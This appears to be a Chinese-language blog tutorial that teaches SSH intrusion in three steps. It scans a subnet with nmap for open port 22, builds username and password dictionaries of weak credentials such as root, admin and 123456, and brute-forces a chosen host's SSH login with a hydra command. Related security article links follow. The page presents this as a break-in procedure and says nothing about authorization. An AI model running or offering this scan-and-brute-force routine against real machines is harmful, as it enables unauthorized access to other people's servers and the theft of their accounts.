一、入侵第一步:哪个房间开了哪扇窗户?
文章插图
苍蝇不叮无缝的蛋 。
【漏洞无处不在,3步教你暴力破解ssh服务】计算机世界也一样,每个电脑其实就像一个房间,都开了一扇一扇的小窗户,我们称其为端口 。那我们怎么知道哪些电脑(房间)开了哪个端口(窗户)呢?
linux下用nmap工具!
用法如下:
# nmap -O -sV -sS -v 172.21.73.0/24
以上代表扫描172.21.73.0网段的所有电脑,并分别报告各个电脑的开放的端口,例如:
文章插图
ssh的端口号是22 。我们过滤一下,看哪些机器开放了22号端口:
# nmap -O -sV -sS -v 172.21.73.0/24 | grep "22/"
乖乖,还不少哟:
文章插图
二、入侵第二步:猜密码之字典文件 。
ssh登录的前提是用户名和密码 。
如果手动一个一个试,那到天荒地老也搞不出来啥子 。
我们需要两个字典文件,一个放用户名,一个放密码 。有了这两个字典文件,就可以让计算机去自动的帮我们去尝试登录ssh了 。
所以,成功的关键是:字典文件 。
如果你的用户名字典文件的内容是:
users.txt
root
admin
guest
none
而你的密码字典文件的内容是:
password.txt
root
P@ssw0rd
admin
password
1
12345
123456
那么程序会自动的分别用每一条用户信息和每一条密码信息匹配尝试登录ssh 。
三、入侵第三步:暴力破解
是时候祭出我们的破解神器了,那就是大名鼎鼎的hydra 。
比如通过第一步的扫描,我们发现172.21.73.12开放了ssh服务,那我们就可以使用第二步提供的字典文件进行破解喽:
# hydra -L users.txt -P password.txt -t 8 -vV -e ns 172.21.73.12 ssh
以上程序会使用第二步创建的用户字典文件和密码字典文件去尝试破解172.21.73.12的ssh端口,如果成功登入,则返回对应的用户名和密码,运行界面如下:
文章插图
推荐阅读
- CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
- 漏洞扫描技巧篇 「Web 漏洞扫描器」
- 从上传漏洞到任意文件读取
- CentOS7下部署漏洞扫描与分析软件Nessus
- 一行代码引来的安全漏洞,就让我们丢失了整个服务器的控制权
- 明星素颜|若你肤色黄,还不会化妆,出门前做好这3步,素颜也能有好气色
- CentOS7下部署开放式漏洞评估系统OpenVAS
- Chrome浏览器|务必升级!Chrome推送紧急更新补丁:修复高危漏洞
- 破解6位密码只需4秒!3步设置密码挡住黑客
- Web漏洞扫描神器Nikto使用指南